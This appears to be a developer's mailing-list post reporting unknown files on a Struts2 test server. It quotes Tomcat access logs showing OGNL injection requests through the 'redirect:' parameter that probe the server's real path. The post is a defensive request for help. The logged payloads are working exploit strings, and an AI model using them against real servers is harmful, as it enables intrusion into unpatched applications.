I have seen some sample app for testing which was developed using struts2.
I saw some unknow files getting uploaded on test,
I initially thought that my tomcat was hacked or my server was hacked but
now after a close analysis it looks a struts2 webwork secuirty issue or
vulenrability or may me my miss configurations or something not sure
Can any one in struts2 team fix this gloabally and help me to get rid of
this locally without version upgrades.....
Here are the tomcat logs which clearly says the story
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET
/common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
HTTP/1.0" 200 74
I hope my issue is clear and valid.
Original issue on stackoverflow at
http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole
--
*With Best Regards,*
Amol Ghotankar
Technical Lead
M: +91 9960 980 419 <http://www.cursivetech.com>
